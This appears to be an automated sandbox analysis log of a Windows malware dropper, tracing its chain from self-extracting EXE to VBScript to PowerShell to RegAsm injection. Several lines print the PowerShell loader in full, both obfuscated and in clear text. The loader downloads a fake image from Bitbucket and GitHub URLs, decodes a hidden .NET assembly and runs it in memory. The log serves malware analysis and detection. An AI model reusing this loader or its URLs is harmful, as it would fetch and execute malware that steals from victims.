                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeCode function: 0_2_00007FF7D6FD40C40_2_00007FF7D6FD40C4
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeCode function: 0_2_00007FF7D6FD35300_2_00007FF7D6FD3530
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeCode function: 0_2_00007FF7D6FD1C0C0_2_00007FF7D6FD1C0C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F7DC7410_2_02F7DC74
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_068A67D810_2_068A67D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_068AA3D810_2_068AA3D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_068A3F5010_2_068A3F50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_068A6FE810_2_068A6FE8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_068A6FF810_2_068A6FF8
                  Source: sRMytgfRpJ.exeStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, Windows 2000/XP setup, 8078 bytes, 1 file, at 0x2c +A "fqt.vbs", ID 708, number 1, 1 datablock, 0x1503 compression
                  Source: sRMytgfRpJ.exeBinary or memory string: OriginalFilename vs sRMytgfRpJ.exe
                  Source: sRMytgfRpJ.exe, 00000000.00000000.1743361084.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs sRMytgfRpJ.exe
                  Source: sRMytgfRpJ.exeBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs sRMytgfRpJ.exe
                  Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4484
                  Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4484Jump to behavior
                  Source: Process Memory Space: powershell.exe PID: 7476, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: powershell.exe PID: 7664, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: 6.2.powershell.exe.116a6201750.0.raw.unpack, SimpleZip.csCryptographic APIs: 'CreateDecryptor'
                  Source: 6.2.powershell.exe.116a6201750.0.raw.unpack, SimpleZip.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 6.2.powershell.exe.116a6201750.0.raw.unpack, SimpleZip.csCryptographic APIs: 'TransformFinalBlock'
                  Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winEXE@14/13@3/4
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeCode function: 0_2_00007FF7D6FD473C CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,GetLastError,FormatMessageA,0_2_00007FF7D6FD473C
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeCode function: 0_2_00007FF7D6FD1C0C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,0_2_00007FF7D6FD1C0C
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeCode function: 0_2_00007FF7D6FD6CA4 GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_00007FF7D6FD6CA4
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeCode function: 0_2_00007FF7D6FD5D90 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,#20,#22,#23,FreeResource,SendMessageA,0_2_00007FF7D6FD5D90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\76b53b3ec448f7ccdda2063b15d2bfc3_9e146be9-c76a-4720-bcdb-53011b87bd06Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7484:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7364:120:WilError_03
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMPJump to behavior
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c fqt.vbs
                  Source: sRMytgfRpJ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                  Source: C:\Windows\System32\cmd.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: sRMytgfRpJ.exeReversingLabs: Detection: 13%
                  Source: unknownProcess created: C:\Users\user\Desktop\sRMytgfRpJ.exe "C:\Users\user\Desktop\sRMytgfRpJ.exe"
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c fqt.vbs
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fqt.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#HM#a#Bp#GU#b#Bk#GE#Z#Bh#HM#LwBn#HM#Z#Bn#Gg#agBq#C8#Z#Bv#Hc#bgBs#G8#YQBk#HM#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#MQ#4#DE#MQ#3#DM#NQ#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/shieldadas/gsdghjj/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.52liw/sdaolnwod/wqtretre/kruremlur/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c fqt.vbsJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fqt.vbs" Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#HM#a#Bp#GU#b#Bk#GE#Z#Bh#HM#LwBn#HM#Z#Bn#Gg#agBq#C8#Z#Bv#Hc#bgBs#G8#YQBk#HM#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#MQ#4#DE#MQ#3#DM#NQ#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#CJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/shieldadas/gsdghjj/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.52liw/sdaolnwod/wqtretre/kruremlur/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -execJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeSection loaded: feclient.dllJump to behavior
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeSection loaded: advpack.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
